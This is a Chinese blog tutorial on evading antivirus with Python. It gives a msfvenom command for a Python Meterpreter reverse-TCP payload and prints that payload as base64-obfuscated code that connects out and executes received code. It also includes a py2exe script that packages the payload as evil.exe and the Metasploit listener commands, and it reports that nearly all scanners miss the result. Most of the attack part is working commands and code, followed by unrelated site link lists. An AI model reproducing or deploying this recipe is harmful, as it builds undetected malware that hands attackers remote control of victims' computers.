编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力，如Metasploit、Empire和Cobalt Strike，但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候，似乎越来越多的人关注的是，这个方式会不会被被杀软杀掉？

打造免杀的payload成了一个很重要的话题，在这里，本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86：https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位：https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下：

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows，同时创建一个setup.py文件：

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py，生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit，设置监听：

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe，获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作，接下来对evil.exe进行在线病毒扫描，以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果：47款杀毒引擎中，只有一个引擎报毒，主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org

参考文章：

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持！
如果你觉得本文对你有帮助，欢迎转载，烦请注明出处，谢谢！

使用Python进行防病毒免杀解析

- Author -

Bypass

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

python编程羊车门问题代码示例

Oct 25 Python

Python中的defaultdict与__missing__()使用介绍

Feb 03 Python

Python中装饰器学习总结

Feb 10 Python

django2+uwsgi+nginx上线部署到服务器Ubuntu16.04

Jun 26 Python

从DataFrame中提取出Series或DataFrame对象的方法

Nov 10 Python

Python3.7 dataclass使用指南小结

Feb 22 Python

pandas.DataFrame的pivot()和unstack()实现行转列

Jul 06 Python

浅谈Python type的使用

Nov 19 Python

python add_argument()用法解析

Jan 29 Python

opencv 形态学变换(开运算，闭运算，梯度运算)

Jul 07 Python

Python paramiko使用方法代码汇总

Nov 20 Python

详解非极大值抑制算法之Python实现

Jun 28 Python

python 使用shutil复制图片的例子

Dec 13 #Python

基于python traceback实现异常的获取与处理

Dec 13 #Python

python 实现批量替换文本中的某部分内容

Dec 13 #Python

django多种支付、并发订单处理实例代码

Dec 13 #Python

Python+OpenCV+图片旋转并用原底色填充新四角的例子

Dec 12 #Python

Python+OpenCV 实现图片无损旋转90°且无黑边

Dec 12 #Python

使用python去除图片白色像素的实例

Dec 12 #Python

You might like

visual studio code 调试php方法（图文详解）

2017/09/15 PHP

js验证表单第二部分

2006/11/25 Javascript

找到了一篇jQuery与Prototype并存的冲突的解决方法

2007/08/29 Javascript

ASP.NET jQuery 实例1(在TextBox里面创建一个默认提示)

2012/01/13 Javascript

全面了解JavaScirpt 的垃圾(garbage collection)回收机制

2016/07/11 Javascript

jQuery选择器总结之常用元素查找方法

2016/08/04 Javascript

微信js-sdk地理位置接口用法示例

2016/10/12 Javascript

jquery文字填写自动高度的实现方法

2016/11/07 Javascript

JavaScript中定义对象原型的两种使用方法

2016/12/15 Javascript

关于Vue在ie10下空白页的debug小结

2018/05/02 Javascript

JavaScript读写二进制数据的方法详解

2018/09/09 Javascript

cordova+vue+webapp使用html5获取地理位置的方法

2019/07/06 Javascript

[38:41]2014 DOTA2国际邀请赛中国区预选赛 LGD VS CNB

2014/05/22 DOTA

python实现将内容分行输出

2015/11/05 Python

Python爬虫获取整个站点中的所有外部链接代码示例

2017/12/26 Python

Python序列循环移位的3种方法推荐

2018/04/09 Python

Python3多目标赋值及共享引用注意事项

2019/05/27 Python

分享8个非常流行的 Python 可视化工具包

2019/06/05 Python

Python弹出输入框并获取输入值的实例

2019/06/18 Python

Python提取转移文件夹内所有.jpg文件并查看每一帧的方法

2019/06/27 Python

Apache部署Django项目图文详解

2019/07/30 Python

Python 读取 YUV(NV12) 视频文件实例

2019/12/09 Python

Python安装tar.gz格式文件方法详解

2020/01/19 Python

Python+OpenCV图像处理——实现轮廓发现

2020/10/23 Python

HTML5和CSS3实例教程总结(推荐)

2016/07/18 HTML / CSS

马来西亚综合购物网站：Lazada马来西亚

2018/06/05 全球购物

我们没有写servlet的构造方法，那么容器是怎么创建servlet的实例呢

2013/04/24 面试题

北京捷通华声语音技术有限公司Java软件工程师笔试题

2012/04/10 面试题

中专毕业生自我鉴定

2013/11/21 职场文书

小学生秋游活动方案

2014/02/23 职场文书

给老婆大人的检讨书

2014/02/24 职场文书

道德之星事迹材料

2014/05/03 职场文书

终止劳动合同证明书样本

2014/11/19 职场文书

名人传读书笔记

2015/06/26 职场文书

七年级数学教学反思

2016/02/17 职场文书

如何避免mysql启动时错误及sock文件作用分析

2022/01/22 MySQL